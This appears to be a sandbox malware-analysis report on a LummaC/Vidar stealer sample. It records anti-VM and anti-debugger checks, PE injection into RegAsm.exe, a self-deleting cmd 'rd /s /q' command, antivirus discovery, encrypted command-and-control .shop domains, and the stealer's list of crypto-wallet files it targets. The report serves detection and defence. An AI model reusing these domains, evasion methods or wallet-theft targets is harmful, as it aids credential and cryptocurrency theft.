Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: Amcache.hve.19.dr	Binary or memory string: VMware
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.19.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1hbin@
Source: RegAsm.exe, 00000009.00000002.2376623871.0000000001025000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW("
Source: Amcache.hve.19.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.19.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2376623871.000000000105A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000130C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.19.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: RegAsm.exe, 00000009.00000002.2376623871.000000000105A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW_
Source: Amcache.hve.19.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.19.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: RegAsm.exe, 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.19.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.19.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.19.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.19.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.19.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.19.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.19.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.19.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 9_2_0043C800 LdrInitializeThunk,

9_2_0043C800

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0041AD5F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_0041AD5F

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_0041616A

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00415E38 mov eax, dword ptr fs:[00000030h]

2_2_00415E38

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_0040B042

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041C8F8 SetUnhandledExceptionFilter,	2_2_0041C8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AD5F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0041AD5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041A724 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0041A724
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6C0FB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C0FB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C2AAC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

0_2_02C12481

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior

LummaC encrypted strings found

Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: caffegclasiqwp.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stamppreewntnq.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stagedchheiqwo.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: millyscroqwp.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: evoliutwoqm.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: condedqpwqm.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: traineiwnqo.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: locatedblsoqp.shop
Source: KKJEBAAECB.exe, 00000006.00000002.2075218652.0000000003585000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: awwardwiqi.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040FD2A _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		2_2_0040FD2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040FE05 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		2_2_0040FE05

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63B000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63C000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9C0008	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DD1008	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63B000	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63C000	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1194008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KKJEBAAECB.exe "C:\ProgramData\KKJEBAAECB.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KJKJJJECFI.exe "C:\ProgramData\KJKJJJECFI.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJECFIECBGDG" & exit	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_6C2F4760

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00401000 cpuid

2_2_00401000

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

2_2_0040E910

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Queries volume information: C:\ProgramData\KKJEBAAECB.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Queries volume information: C:\ProgramData\KJKJJJECFI.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040E863 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

2_2_0040E863

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040E7F6 GetProcessHeap,HeapAlloc,GetUserNameA,

2_2_0040E7F6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040E8BD GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

2_2_0040E8BD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: file.exe, 00000000.00000002.1639431467.0000000000EF3000.00000004.00000020.00020000.00000000.sdmp, KKJEBAAECB.exe, 00000006.00000002.2074815784.0000000000883000.00000004.00000020.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2087448551.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: Amcache.hve.19.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: file.exe, 00000000.00000002.1639431467.0000000000EF3000.00000004.00000020.00020000.00000000.sdmp, KKJEBAAECB.exe, 00000006.00000002.2074815784.0000000000883000.00000004.00000020.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2087448551.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	Binary or memory string: AVP.exe
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2896, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 